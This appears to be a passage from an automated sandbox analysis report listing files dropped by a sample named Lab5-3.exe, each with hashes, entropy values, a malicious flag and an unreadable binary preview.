                                                                                                          SSDEEP:384:mewBDgTieEs5InX5wm3qRXUIc/1+rliKNwctb:aOeeV5gWm8kIq14NPZ
                                                                                                          MD5:EF939A042AB1295FEF83D15CC1C4EEFD
                                                                                                          SHA1:D59207D3631EB7239D475CECE7CF4929325B61AA
                                                                                                          SHA-256:CF3147B642B7776579E80C181CB3CF5665DCBC6C465595E9118F4D18BD489C14
                                                                                                          SHA-512:AEE1AD01979D7FDDBEDD11609116FC5FD0AD5A894AE90AA30F911FE665E44F4CC0BCF076750AEEB5CCA7D65DF4E2B0AADF30A057A3D4DFAF35ABA2A0DEF9316B
                                                                                                          Malicious:false
                                                                                                          Preview:..].....*.?g..?...ZX..... o.:7.S%F.....AU..,,.d.U......rk.r..G].$...yJ".v.V#XQTio.G........>.......|y..5.......=.....|L...G&..[..R..*.....9$..b.<.....l.y`.B.6..e...[?......P..kf.r...pB.N.c.{..o..*...=_c......W..?........$..AQ.A....5..mD..?=....f..4\Q...i.&...R.n.....w.....z.[......N..)3..0.A..V\.......$o.j$.i^...5.....z[k..|l..+v.g ...`...u.Oz..w.`c*....M.....Z6.M..V...7<.R...o)X......k.(.@#.'u.....4..u.....S7lz....f.P..<.s.K.c.Dp.....`....Yr..?f."...xI}.0X......Q#.C..\.0..A..T.........s..e../+...V.c.m...9.w9.w......lr..2Y3....gH'v...Kw b.9.EC.I.<.K.\.....7.v...e...R.....3.....%..8.TL........L..hH..m8....4C...D9...S..,'.O.uQep.pgE#<..+...T.... ......s{..Q"..8.N.AM^.l..T.y.\t.Y..]..l...G..+...HS.uB-90.S(*.s.y.o...se.....8....KL.@E....95.#&.|2.*t.|...-...[.0...k...!1b.|.X....S`......,.W.n........k.#.b0.d..*..)\=;A.a...k^...T.a.)_...;.zL j?...L.i.....f.:a.kK._.n.&...)[....xZ..-_*a.@.j.0...2...~.gk....DF.Y..../jSe....\...D>..AZ..H.!e..Z.t..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7776
                                                                                                          Entropy (8bit):7.976111449125631
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:UY5XHJxEchIOqMjgUc/lb4tGlF8+LEs+W0Cb:UqJxEcCOq1JtgQaFbWtb
                                                                                                          MD5:14E9D3EEC8326FAE4A279E3FE4C2D398
                                                                                                          SHA1:4D8D3A3BB84F5120147054D2EE531B84CCBC98A6
                                                                                                          SHA-256:632453F8248362313DF600FE50FFF99044C82E41FCE47EC5D9063E9CD120CD96
                                                                                                          SHA-512:3E8C9AAFA5665490B1C6F0E95537AF131DC247A73AE9336ADB8F61D6A9EC6D082484412EE6BE06846A0EC557C9A3847010344BFF7487924FC7026A9B4AE8FE61
                                                                                                          Malicious:false
                                                                                                          Preview:...@:-gD.1... ....."I.W.]Z9....%;...W......N'..7Q.j......7Fub.....=.&..r.[...c.."..,.`...z$.aN...u.g....n>.}j..#;.ND..........OJ..w..[...%.\...-..h.....Z2...D.................d..k..0..\-.V..N.G...&...6-f2)w.......E..V.R#.2..f...)q......;..,.D..\....Q`.B..w~.Y..O..).c%&V.8..i.r#[....n.yT..-KF~.."y[.}".......<."...7.?z.._.3Q.............~m.i..H5.7.;.....g..7p,.p..V3n....]..........rZ..F...f.JR....Z\.U...v.......o.9$.W`.)...Z..,........[...W.K6..W$gG.....{.......]P...v..VJU.pa...x.9.......=.........x.z.3..,2.`Cac.$.....*....<.4Wf...O....?....v..5\.J6.....h...(..d..QUV.cf&.<'f..h.)..4.............'.J....~ .?.#o.....h.;...E>..z. /A.....w......{..Y..'...x...l..Ht......>.m.l!..VJ.h.K.x.v.y..n.V.$K6.....#.^G.%2....[gl.B./.a..DVi...j......v...K..$.*.......p."qk:...H...%...D...&.R....@.~<.sZ..S'......u...Y...Wk.XfK...lT].&.g..B.L}I?.i....S..c.W.....P.....'....i.?=2.1...../..W..[N.1..N...........WZ......Y.l....ZM.k...K.....I...T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7280
                                                                                                          Entropy (8bit):7.975765437724219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:NehJvwKPntjDAdEcuWENoUS9W9DQhJgTZ990Cb:NCWKPtjDKuWUh9UheTZ99tb
                                                                                                          MD5:98C6FA05FE67458CBAA963BE992900BF
                                                                                                          SHA1:C38223A35A1B5A432CD9D581A5465773A1DDFFE2
                                                                                                          SHA-256:62EABDE239618ED2CF2EA1ADA061C8708CD9CB082BA162C8FF5C60402BCE0DE4
                                                                                                          SHA-512:CB752CDF2FF4B931FEE54CAD4A888469DA529F2CF1616259CA0F35B500988271BD2843F14DA0462B37629185E9AF153DFBAD631FA7A2A4CA24814DC340BB2619
                                                                                                          Malicious:false
                                                                                                          Preview:..iGX....*f.....`....b.:1.......^.A..q.7.pW.cl.y....o3..H.M....N.P.....|.......@...&w...".8.d.....'.....!. .6G~y.j..G...@% ]......)...]..<.m..,..;x.W......i.MQ.....p<~#.l.y...pj.F..];..S\......:M.%5...T+.4.o.......T..._.......}.h..Mn.....)....(m.kW+....t....'.Y.r`H..<YI..........>.[{.'gq./=` .........7.t4........K.8.1....I..Q..1F...eQ..bFy...d.....t....%.......d...%.K...........V..Z.\C.AK.\.Hw)..t.......E...^......`t.H3J..?)...1..wl.$p...?.s....LA..*j'..Hh..W4......V.A7.X.>.5..;...].at.t..B..~Q..c.kS...B.X#5m9A..y.Ly..M.....n...L...yMR...Z..H..........\..)...>.M.N..'n..Y../1...&..f<lf..O.......VL.._>..)c LR.E....C..E.....j#.......R#*.......#Fh.u...M...a.^U.h...{..o.>.3.@1+/....1..)...{.1.sV*....(......6t./CW...`.y ...D.]..g..2...^V..f.....B...~.<5..$........!..,....4......:S[-.....n?S.d....\;.{y/.. DM..x5..Ru..T..n.,.a.3...L.Y.!.-..h.......ae..lp...~^....e.A'...MK2 M..|..#J.w.....,.$0..].(.x]!...l;...=...8...U.[N..`.u..z"..8.`...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7504
                                                                                                          Entropy (8bit):7.973525928685102
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:oXJc/H30mayVM9aJdYF+j5/KwTDjkdNueTt0Cb:oXJuZakCaJiS/Tj4tb
                                                                                                          MD5:7550870B49164120FF60EA1211296FAA
                                                                                                          SHA1:9313483AEB331D57A4843A574459C4813235BADC
                                                                                                          SHA-256:743B5815B96427C25797CBA81F579ABD316D68D33C56C2F6DC3B1E5AAA3F8F31
                                                                                                          SHA-512:B0BED1FE0F55D02345C60956E1B261ED80B44A628EC8A972302FD4F1C2A5EDF0DC6B6E3B6C6618A3B0A622081E9740271F3F192AA441A163B634AFC75C7151B2
                                                                                                          Malicious:false
                                                                                                          Preview:.F:..a.e...B`.....t.{....?H.<.5.^.^1.1...^|.II.....F.3..)v.. ...,wa.a.>,.L._=....s..Y..,B.......P...3.^B..X.....N....[.(...G....vx.A.D.........51...."".F|5....U.).u1."Hq..p..r..q.kJx.... [e.......m.1+3...a...)Y...6...C..e*.....x@.J)..a..S.;/..}.D....g..8... .7% Z'.....Bl.....;Q..8..@.._...w...D.f.vm.a..0....|..,..L-..m..1.(...#..)....{.jV?,.V....%.......X-Hwk==:.v.&b.u.vg.";.......@.|....v..4.3KZ...Dp^...tV@%..A.8....T.....{....t:&0.<J...........X.wO...i.K.m.Q2^.....4*G..=L).`....\.....OC..#.V.....F.TI.....;W...."0+.zC......g.W.k...S.y..{w.z....A.r...R...+...G..Bv...L......_..p..!.....I..N]['...>..u.K...T.[....K4R...Iw....k......U.G....&....P&.'.uI.w./..z/..0..m.wB8.....&..P{..i..0. .w......hn....4.n4....fc.C(j.&2....a....P....b..%.....A.}'t5~fL@-..bUn.......1..T...k......P...7.`q..&._....&..)q..xX.*.s:.~X...g.r....6d...mms&.....^t...n.....*[ $.....#.`.Y.........Q.i.rkm.A#..7}...3.q......v.|.0L.=gfi3=.#z..V........3........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32640
                                                                                                          Entropy (8bit):7.994115166110571
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:WveJSDUMU5cJXghKjmekkgvyZGxj0fvRzcDy6ioJUYqK6qjupYXOGZ:WWJ/MU+tuxemvQ40fvB2igaqjsWdZ
                                                                                                          MD5:427A8AE4A3C5F200E46D3D4784AE8981
                                                                                                          SHA1:89446F99CEBB5A9A053C92F452A76B0CF0F50480
                                                                                                          SHA-256:7116831DD36BCCB5599717EB51D8712F33AF1DEB1D51D8D494DC2EABD757C939
                                                                                                          SHA-512:AA889F012BF1D485E645E2EADFA8197CE0F2AE21580556EA14F20614D39B0BDF06EBEB4DCC1A322290C9A204AA7768170C47EAC939B136D00A508907E02F2DB4
                                                                                                          Malicious:true
                                                                                                          Preview:.j..."..?#...;.g.;._..5"..m..hT-z.....[.....O........f.t.I~..<.m.s.}...vC@...pn....c{..t5..>..W.e............}.....c....?<..3.K..c......x*....NJ...8.0,_..(<.@;...u...,v.)..^$(o|E8D....$.V...tG...*...1.j.E...G..V........l.{.F...I.9.....~f.? ...;/#T9..dx..\...%...*........d...2.(..4..'..B.B...A+/.]....;{....8.;......{*.f........7.5>..m.._.....r9..em@..,..8....qn1.....6.l.QTh......S..,A....!.VM.F..5B..$&d....m......d2_.._z....;).=;...."..,..Kv-..Z...~..~56....,......^...t..u.2.b..=.....y.^H..An2.obT...Fi..l.E0.....o...<j[.T/DZ.(.6k.......&o.R.....`.......%.|.f@gb.V,..+.K......n....[C.b............X+..'(..i."Y.N....M.....:.WTb..|b..rU"*. B.H...TAsWs..S...F.(M]Q........,.l2.U4....#......0j..N..y...l.y..l}..B.zX4}.[.0..b_.w..r..........L.]..V...E....J....]o... @....v.a..:u..3.^W.f9>..._f..>....vq..L.....N...1I-.....4B..n.\.@..1.....HMYtHF...N[..-B..1(........(.k...REt....h..X.).Y...+K..@SH......Q~E.....1...ev..m.0....s....+.....m..J)...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10656
                                                                                                          Entropy (8bit):7.982875262425538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:juZoRs3d7S+oMeHnsAVskC+F8MBZr+QRg/zkweq96VnkUwgIKNXd0Cb:jUoeu+onMsHC+2Mb/czwMIxBXdtb
                                                                                                          MD5:5336CBB4266929390D8C2F4FFD654A79
                                                                                                          SHA1:8E77D3F844920F90DE4A305549C57B3A24E60A5B
                                                                                                          SHA-256:A8CB6A1089737CD699B04D8667DAE907D27984E17EFACCD9170B2ABB9BDB215B
                                                                                                          SHA-512:6B114C09BA41D6411EC09794B860AE76CFE9E17EEF9517FB042ADF1AEA69FCFCDAF8AB9D0714042AF733994B9EAC4B28E734F053E3A079964C737C91E4F9FF04
                                                                                                          Malicious:false
                                                                                                          Preview:...,p..?...*"...^.Qm9..7w.#.....U.....C.y.]]...k.4eVX.:.^...8...F(h..".7}I..|......"...v.<7".....tBJ".;].L..^4..t....Q.;.I...l.....!. 5E..k.v."^;C....n...@.>.9:.(...Kx~K%._U.Q.#._..|L<..l.B.dP...k.....Ju....R....ZDu..*O.{.}#..n.u....../9B7[....h~...h........U.d.v.tf...D.C.'.I;......"..(.5.W..Q..C0.}...s..K .E`Y,1.{..e.Fe.N...[.!...'l.O#.........e.j>...4Y.|.v......W.R...........M;.zt..Y......3.)8..S...fp...1"-.s.@.:b...28.2..^...$...u..F.t;..3..H....-3.1.w|U_aN...."=..i8.VCl......>..6.g.......Dj.>.O..wX.f`...,..)r(..|... o.KT<u..1.....&.QZ)8!-..[B.z....c..mdT.n%.....kl.....$.]iN..Lp?0..R.<S.+x.....-.@..>..<.d(.(...L.....*..O(..)O..7.c..b..|..w..>..kb.x...+`mx...8m.V..x>#m...Z.|G.2.h.?....U..5..J....tKMU#{...'.2&q...C.E.j_iZKn`?.....G...`._H.....M.>....f....0./.<E._....k.I2M...K..8..f.Tl....9.M..%`..i.c..4y......G.I..V.n..B.....f.k..+........y..Y....f..f^.n.......#<z....7=4........#.9$.%.....j.r..9.4.y....[..V....?.H.....+..aM...>....L...;2.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7712
                                                                                                          Entropy (8bit):7.976754677338952
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:2FG5p1oYSwy+l6RthOBUP8O5rWRv/85z+l9QD0Cb:2JYpyugHUUPLk/8EQDtb
                                                                                                          MD5:872B13025E69D1B49A1DB5B53518534B
                                                                                                          SHA1:71ECF06FF51A40E78739B397AD70472066C6C937
                                                                                                          SHA-256:BCAFD08932EB387CAF1688A0CC3D02F18754C213BB27BB11C392C94339799313
                                                                                                          SHA-512:5B1268F736E1069EDBC3BB256D5CAA3675388CA1ABACCF9A47A3DDF55C76D9A584E5F78DD239FD8D7A89800C73311516ACFC569DAFFFE5E5FBF5101154373CF1
                                                                                                          Malicious:false
                                                                                                          Preview:n.Z..[|:./.}..H.........V.t...|.....$5.v....9......~..Hs|x+W(.|.......+[.|f|.].{..1...i..$.+..L..Y..%..".#....Y2.....U_G.|....f.......a..@..=..g.R.7...V....e.n.......Lr...@.K`."d...........9.).1WK.+v...L.....d.u/..nmC..i....oU.p...y.4....`I...g....>...S.).@X.f..ov.....`}...0.;.DG{.).N........`Lu.I-....S.gT..........B..T..7.......;G.n.B.....E-..S..;\.0f(.`.;c..U........bfm.L......'...k'....f[.We....4"...H.o.ey.^..,WW.....).!..h+..l~v...B.~......"..Z..=?....%..z.......].........j...i.|.X.y=2......D.yF/.\.%$....I>............ Gn.<.R.)...h..5.va=Y`.....&..s.d.m.M.*^.Y.X....Q...l.y,.....b......`..K..L;.u.w..B.Vl.z{S'.p...>.3.@.D*..x..j..8.J+..=..L...6.6....n.\v....j6...G...g.........t).T._~.'...3..s.A' ...h..97.a.Nd..}...wTW}.....8....B.t....oIwQS.Ry.,y.L...a.u..3.J................3....:x".....K.O..hr=X.h....40^..U{5..Y.,DH...".cC....?.I.qz.....s..M...mC{..........b5....3{.1.Y...c.B.....C..^...jq:.K.&G...7jwp...t.y......`6 >.PC.{.......a..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8384
                                                                                                          Entropy (8bit):7.980727508954233
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:aLl4AT+aG6hxvS05IoPVZ8D8jF9zpv3vAOrL8GgumINznLQTZJxWU7DzPLY1Gx0a:aKYVn5tgD8jF9hvRr0u9v47P8u0Cb
                                                                                                          MD5:2F53D2F4208E7F5113DF135CE40647F7
                                                                                                          SHA1:85AD464753524CDC093A2DD1FE5D3B033CBDFB4D
                                                                                                          SHA-256:75E276D2D82F5E8B3B7230BB7F7BD8003FC906E5499F26CF0CE3EC2B2A861C24
                                                                                                          SHA-512:7997B9B70979F58FF553FFD031651031C712C124D575893B82442CEFB6CA09F5CB88E2C9587168ED1EE18230FC712A939BF99519BA96774DBA56C45DF0E0E256
                                                                                                          Malicious:false
                                                                                                          Preview:.IP.......W..{c0..i>D..%.^*...p.. B......`....P....m...:D.....(rAAC.wb;7...ls....?....,24a}.>.Q...D}......j3b......F.. E......z..)^|......b(.....r.H.66...J.(.....>..8.....i...%X...k.U..U Ut..&ei^..;.j....p........H..2T).J.t..7.....W.,...../....>`Ay..&.5.........}..I..|.@.1.r'.......BR..`..ueK..W..D..K....ce..2..9.o..4b....~........=.LV.....'/~`]^...Y.S#T.....>...E._1......-...U..9....a.F.Nh...9.^.Y~qx...A.6O.~....`..C.d.f..9..'*.......L....'....6..s~.Em..);......i..C.&&0..W...?(.}He;....(2......x.e.P=2....Z./..^?...?j.n\....c..f...v...K...h.4B'R.]......*...H..8|Td............O2...CjJ.....g.z...Z.QK'G.[<........s...6N..,.....:..6..&.1.W}.......x...8.Y...4~Q.S@.i.....W..B..7..Dr.G.3......c.@....s5..2.......B...'=}.K...3...s..MZ;...b....}4...E.AP.D_+.......>_y.n....ny.....3..t....S)I..7.3,...}...g9.L.W.V..V.:*.N. ......4l....^e.7.Ol...t(d~.Ws.....:.ZY.6&._......u..-...2.U..4....#.o J.....]X0].@9..%:W.^...].....i.b..6....b.ok..o....p....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):216096
                                                                                                          Entropy (8bit):7.999057534006331
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:jYoggh5v9afM9bI7+fnxm7fZIAj1Vc5vXoWmgZ:8oggh5v9/O+58RI4GvYI
                                                                                                          MD5:9036D30D82F13AE71143D56453104B3F
                                                                                                          SHA1:F7D5EF36C8C63EEF391391E36D69717E5BA7D665
                                                                                                          SHA-256:D7441B0E358831FF679771727FED8C636C98B36CED588E8997D706125AF1217B
                                                                                                          SHA-512:A6F6F8A63D47D27A81AEE4B133E5B9CDA4B2A47795FB639C4805BCA817BE45B22B3C840664EA48FFBD0618187632BBE3D9FA0AAE23BF6B091A27B0621FE85E0C
                                                                                                          Malicious:true
                                                                                                          Preview:.~.'.@....Ld.q.B..*~.=...X....po........9.R.Z.....J..D-...W...M.....nl~.....>...#E-..7.......f-.V./W..+Y$.<.9.\...X.r^.......7LE..Y.V..>...;....E...wb)..$.?.4s.^.....<d..0.TG..7..).:.@.Y.B...sn....#....m...fb..'.`?S.8h..3~../.:......sLo.Da.h<&..#.1...Z.....M*..&.5......A.Wo....R...........{wH<......?....M....%.L'./.e.7."E...9JO.P.k. eV......}..P.I....FEw(.&[...!<..@p.M/.....].....Z..N.|Z.X........P...oA.....b!...=....6.3+p...Y.......SjA.Kj.....K.UdX.j5......./.5ulK^.-w.B..j.......8.....N..k.(..._$N.h.$h....$wb.0..)...D.H.]..6y..5.Q.[.../.e.......K?......(w....u........`....UFJb9....3.!G4..#\..1...#F..2... ..0..7.....Ez^.q..t.@.m0C...C.k...r.R........Q.$.#u....z....G....-k.v..Q......pM.S..".yo....3...DY^'.......n....:.jS.U.B....(QR.Q...;J.......$-.".`~Q..P.o..8..c......t....h...v,t..y=..^:(..Zh.nQ..&.3..sqI.D.=...T........H]:B5l.......Q.V.......D.o. ...io:G.....@wxjm.{..a.z..>...|.r.......f.h..+4Y".)...A.l...{.....p`.....~m.o....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):496631
                                                                                                          Entropy (8bit):7.997434244165063
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:Eg+/VZzV4P8WTS6UyuUX1TOpKffKBx4FFcF0W/:E//VZKSdyuUJjXK74FF4X/
                                                                                                          MD5:31AA72800E3676656735E95A76533CF8
                                                                                                          SHA1:A0647C858E8342971730DBAD2151B384A0A8EC35
                                                                                                          SHA-256:9C77AC1F04FA38ED1EE68623B3E85AEA1B3C2CFA2768E80A48FA551CFE34B280
                                                                                                          SHA-512:5B1D1913924FFC7B541B5DC6E4E4E43462B1E794141561A1FA19C2DD372A77400648806DA6B27843EB3A90D43D8EA2B21D5608637CEF0BABDAF592BF28E0D0E0
                                                                                                          Malicious:true
                                                                                                          Preview:....h....n..d&4....b.w)|.1.o#M?...^(j.S`..I..*.e.JPRq..._......RJ..f..a@W6..A..h.A.<h/f..v/-..S/3F......]W..HT.]G.$.j<fnJ.....*B(>I..(.y.ho8.;.9K...5G.l.-...r1..'.E...../.k:.#......p7..s......l..QW-s.!Aj&qMR.)bg~...EI.A.v.......pa........W&...]#.G.%....n4....,...+....6.$|T......_.!....MK........&......[.VF...G..&.....@..SWT0.e.x.p..G....J.....c.S...^.rs...R.#..a.p..........y.l.n![....2I..R..y=C.3...Z....f.)u....'.!9F..u&...AU..(_..|.p..6.c.G..6...<Y.s.$vO...p8.i..J..S.....f..iR.v.n..(.m.........A.y......+...Z.....6."..3..9.TC..u7 e.}v.x/=>.,.......d".2.3La.........X>my.{.P..1+<....).v%..&.$.}#%X../..=.j.G.-.@...'w=.=7`=).w...*.9'\T.Z.d.a..D.FE..%.{.#... v.j9...a].R..ak.J.h.....H0.3..s..R...v.n..R.Y4<f.........k.....s.a.n....b.....t.9S...a.a..k-......^....v..w.B&B.|.V..p...!.V..e.U.u.|".%.,.....s..1...p.......8.f.~g.}...`.C...n,..F./......l`/..l+......zV.L...f..,.z...}.2r.1....~{.a)KZ[.d.......-..'......X...l:.v.8.S9_..i.> .<5.Y...).N]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):247664
                                                                                                          Entropy (8bit):7.999341824876689
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:kLGF156+cOFo2wRKklPDrmBKUmYmvkz10hpGAbZ:+GFjjcqEPDKBKU2MzGfG6
                                                                                                          MD5:BAEAA742A66253A9241D1C6569727F62
                                                                                                          SHA1:F58DD0B7CF4C95BDFD69AAA35EED8A71200F944F
                                                                                                          SHA-256:FEA572BA42067744472934DCBCDC48A25138A04D10D59058F106D5ADDA9D2997
                                                                                                          SHA-512:EAE9FAAB3F5DEB30DD7CEE515F7AD5911E27C2AD3EBA37CF79617B49D76F7420D77EE1A5B282D270D36C60D2913098B0BB8C4F106AD2D58E0F0785521DF8E0B9
                                                                                                          Malicious:true
                                                                                                          Preview:v.#...E...|...#.@U+..m.A.)....z.-....[..y....x..WI.....9..u...*.GJ.2........(....2%[..C......Q{..4.i.:\.+.........v..W..oR`@..b...u..Tq.La.SS......).;BL..D..(.y..P.v.~V.....*.k..U*.f)!s.......=.........wy..H..U6....].G..C.a.}..QR.0Cb..[.a<.....})*5..d.z.F..j.|]......\k.....l.<...N....o........}..oG:u4.z.... *..hR7g.]...uoE.Z....._..'..p.}Y.EL.B9....z......;...........O-....F.2(.....*g,.|.i.vv.Cp.J..%...Z.........j..D=..Z.....W.%Z.:..j.$..y`g.i.I.......c$..hh..v..w...!...!....0.."_|..B.N...a.....a.b....m.BF..V8.i.6.SY..x]..;.#..T....s./...n.gk.....18..<<.......r.0....k.r}....qr.72.......qt.J..}.%.P.4._.9[......j...S6..%I.!......m..6]...iL.......-....).z...6..66t.7. p...........\F....`....~.<5sF%]..Z.......8. ...h.H..A....{....e|.T.*..%M!v..6..%...n)T..S.J...`...J.).h?..d#Z..M:.w....W..Ja...R.J..R7..Z.Azgj...).-MZC.h..T.a..;.+.;$..S...u.R.J..p@#.ibiQ...m_.6Y.u...K...q".@.7L..!....%Q\....gg....8..u..G%...n.Z.N#.G.^R.y.7U./M..+3*.&"....BF..;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7600
                                                                                                          Entropy (8bit):7.975069693942189
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:or5+fxB6dRNUFrhqK4HwNUJe5kYrCZUgWE0q+cW60Cb:AoBO4E1KUarCZJ+Etb
                                                                                                          MD5:5A3FF1D8050AD25EE362B3D5FE2AE14F
                                                                                                          SHA1:D1809472E221CACC66FB4A5B1AE1858B9882A112
                                                                                                          SHA-256:95D043683128E666A12A2AEE19F42B049CA326909FAAE10EE23FFFDD0FAAD91A
                                                                                                          SHA-512:82AAD865FCCB53BB0C0AC69388FD2D53F265F7230B404B9F96740EA413AF4FDB9FE0BB28BB19D18DA95E03893B67ABB3A7988813013E5209E4744A5A2D11E01A
                                                                                                          Malicious:false
                                                                                                          Preview:..9...|..;..[..?......:..[..b}7.X< 9ir*2?../......b..c......1....(...7....!5T.]..Q.".=xK.....Bd..|.m=aD.=..~.>..c...F..8.`h...I......L..Zk.IRk....D.....f..=.x...\..2.....Q-..z.\..SL}.yK.1.._p.|.M...<..c....6....M...{.,..M..."!.$.V....c...W6vS.h....A....B.....%^B......2..J.Q..'5....y.r.B.....v.......O.83.=..IC.3(..-{.....0..f."t3....jf3........6`@.F".)5..l.....m.{.....&.......#....Y[{........Zh..s..Z8.]...1......N.....sSh9.Q4......i.saJPPgz.....O....R.o....U~..u.v...nKz;a(V..Tj<^....* ....fW.h......w.AK#...3r@.."V(....>..E..,5H.U. .7gK.:6j..;.....rr.S.`..lrv....zCS...IBW\JY..I..a.&..m..G...n.....C.7..%(...-_.W.{.....D+.....j..9.7>.Z..Z.......U%y.i....9U!.eh....33. '..4.....\....(....*....e(.e....U.hU..Usm.....{...2[...8....z..O..^0.{A..z..f\+...y.5.y<#XFL....-.]..V.w..."........,....g^....l.. D\.ub.m.....{.2..X.Fxx.uOA...D....0..+....`0Dj..&.R..N.......cO.W"!0H.^..0;.6....T..5Gw. ...r.1..{.......>...z..:.g..."IR...>..n.Z.\........S2.J..b.c.cX
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8288
                                                                                                          Entropy (8bit):7.976493490851951
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:QjKyQwB1jnsgtThbR6ticuakPV4/wTpiLbYak1UawXXyfe90Cb:QjoaJnsgt9bR6qXa/WYnYz1Sl9tb
                                                                                                          MD5:C37EE9F3FD515A5C0625253B84865405
                                                                                                          SHA1:445944D139385BF2DE5B4A2C13136F7F80677F80
                                                                                                          SHA-256:E3D7FD8069A92CC1A5CA7929C2E6E6168DD2F0371F117E7E98E3BF9F8A789F08
                                                                                                          SHA-512:C7CBF3801E9A0AECEB35A832B69E51C44495A30BCC3AB8DD3DBCD87F39B474C31FDC47F0E529716612A3E19F3969E9AEC6BF2872891604BE7A496EEC4CF7EB5C
                                                                                                          Malicious:false
                                                                                                          Preview:0.....Y...p..Z`.8b}......R@..!..|..|}P..Z..c.V.0....../`.@5...v....#t&.Tt..<....A.;.s......(.vW.r..J..Z..su>...AO(K.X9.p...%O-u..X)..3.P....R..h[..|..#.......mG....p.6?..H...."lv....k.....N...0..+..P.8..1..%.IV........i....A..E.e.7..Yk.MO..`..../=I..0.yi....I^^}.+Z.2.Q...../t<...Q...6AP.S....e. :....BB.6.......[...4\:.1..[Y......E9.8_..@..e.a...D.<.%.?N....9i......p..}.H..$y11..5.n..[.....AE.Q........JE.Kd.._*]S...".....;*....(g.z..10.H.AX.....dffJmk3..j..0.5!q.G.}.g.L...CU[(.GH...gG.nPw..L..?u4.....*..q1uS..9p.......?....b.-u...&.].....R<l..2.fs.cK..Jt.O....`........?....5.i.<[...$z.9<c.V..b..i..]........H.....7.x.ku..A..89.zMey....D.....JA.o..Cswd....{.q...A.b.4.b.Ky.l.....#.>l.....w.....p^.bKvr.H9.gOVs..t_.=.1/....F}f.Z=...........\.?.L..R.$.:h....Dz./.@.wNSc.G.:}......".S.4...1k..>?"z4./......9H..j...".S..8......@.}x..>2'.u.....30..gT.&.k...us........vbU.d.qhB.AQ.I..=...xZ?__.....p..+...+.D....z........rrB\M\..s..rW..".A......^.}.8$.p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):51664
                                                                                                          Entropy (8bit):7.996886507955507
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:bwHQPlH3iyIxSKjmSJB5zIRV185x7P+ffFSmUMos47G8Z:2QPdMxSKzJsRVoN+ffFSS47FZ
                                                                                                          MD5:EEB33A60ABB67FE71FEC8DC4D46AB809
                                                                                                          SHA1:6483BAC5304C4F808EF5AEE9EF7C0EF95178EF08
                                                                                                          SHA-256:D1444728014C0B5C06B66C74726652D2624770B6F526654BC7F5BBB30F60E664
                                                                                                          SHA-512:3627FE7D4ADF6A67717609BB2A9ACE3642BA2AF5EC0E71D7DBD108201916DDA0C58A0EAC9FDE6A63555B977912C324ACD88B1F1C8995752AC8D419AA1130AC48
                                                                                                          Malicious:true
                                                                                                          Preview:...`.._&.c...A...".s...Szf.xv.../..:>.........Q=..O...A&...o....Y...w..%.%Vg.r....J...K$qv...-nJ.s.&~eF...o.........p......\....S........1......y7.Bh.]xw..E..Ku.dr...Y.@......4<.l..(H{0Q.m..M...<_....`....G....R.y.....KXm5..Y=s.A.-p...t.P.'.[.c..q..)........(..T..*.Uq..|..`.X.1..].s.....g.rC..Z....!y..o.....K...<...2.....<T$.!M.\.L...|.Sm.&A,.'.5..9...bx...E.h./.SK.e.y).....w./.D=.s #..e.w....m.[.!.\o...<......q ..L.....9dm.-3Ple7.`.kHzQMG.gjf....~._y....p.RPO.....oy}D2...C\...=<.=.......G.@.E..C...y..L......<.$.x..&t...?......NC....~..mV$i..E.B.g..n.!.D.u+`..x..S.M6W..-..[.>.k......y.Vn_.........9.1`.R..p.....xy...^.......F.....]..0.0.3s."...(T:...Z.s.....j.....^P...#...0I..[.Q..O.y......$....."x.3.b..|.D~........-GU.}c@..M~.......82....?d1jE#..\...p0.-7.X.-......T5. .b.vi)......;..zJ....@E.<.@.=eX.c.4>;rP3.h...7_V.N..r....u..\.....~[N\2...L@Gf....w.4?z.q..f'...y.+.kM.........T.O...d.e*...4.W...>k.*=M...GF.IZ."i...7T.`..K...t......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20128
